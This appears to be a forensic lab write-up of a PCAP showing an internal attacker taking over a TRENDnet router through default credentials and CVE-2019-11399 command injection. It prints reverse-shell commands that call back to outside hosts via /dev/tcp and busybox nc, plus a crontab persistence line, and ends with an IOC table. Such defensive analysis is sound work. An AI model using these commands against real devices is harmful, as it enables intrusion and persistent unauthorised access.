The SOC team flagged anomalous traffic patterns originating from within the network, specifically targeting the router at 192[.]168[.]10[.]1. The investigation centres on a PCAP capture from one of the impacted machines. The attacker, already positioned inside the network on 192[.]168[.]10[.]2, leveraged weak default credentials and a known command injection vulnerability to compromise router firmware and establish persistent access.
The router at 192[.]168[.]10[.]1 is the focal point of the alert. Examining the PCAP traffic, we can observe a series of HTTP requests directed at its management interface.

Drilling into the device details, the router is identified as a TRENDnet TEW-652BRU running firmware version 1.00b1 — an end-of-life device with no available patches for the vulnerability exploited here.

The first hurdle for the attacker was authentication. The router was secured with default credentials, and the attacker logged straight in using admin:admin.

With access to the management interface, the attacker turned to CVE-2019-11399, a command injection vulnerability in the TRENDnet TEW-652BRU CGI endpoint. The vulnerable URL is:
hxxp[://]192[.]168[.]10[.]1/get_set[.]ccp
Commands are injected through the lanHostCfg_HostName_1.1.1.0.0 parameter, which is passed unsanitised to the underlying shell. An initial whoami confirmed remote code execution was live.

The attacker ran a proof-of-concept command — mkdir test — at 2025-01-22 14:37:59 to confirm arbitrary command execution.

With RCE confirmed, the attacker made several attempts to call back a reverse shell. Two approaches using bash and sh TCP redirects failed — likely due to the stripped-down busybox environment on the router firmware:
bash -i >& /dev/tcp/3[.]125[.]48[.]181/13337 0>&1 &
sh -i >& /dev/tcp/192[.]168[.]10[.]2/4444 0>&1 &
The working method leveraged firmadyne’s bundled busybox binary, writing a shell script to /tmp and executing it:
echo "~/firmadyne/busybox nc 192.168.10.2 4444 -e /bin/sh" > /tmp/shell.sh
sh /tmp/shell.sh
The reverse shell connected back to 192[.]168[.]10[.]2 on port 4444 at 2025-01-22 14:42:25, captured by filtering tcp.dstport == 4444.

The first command issued over the shell was whoami — standard access verification. The attacker then immediately planted persistence via a crontab entry:
echo "@reboot /tmp/shell.sh" >> /etc/crontab
This ensures the reverse shell respawns on every router reboot, maintaining access across power cycles.
| Type | Value |
|---|---|
| IP — Router | 192[.]168[.]10[.]1 |
| IP — Attacker (internal) | 192[.]168[.]10[.]2 |
| IP — C2 (external, failed attempt) | 3[.]125[.]48[.]181 |
| Vulnerable URL | hxxp[://]192[.]168[.]10[.]1/get_set[.]ccp |
| Injected parameter | lanHostCfg_HostName_1.1.1.0.0 |
| Persistence script | /tmp/shell.sh |
| CVE | CVE-2019-11399 |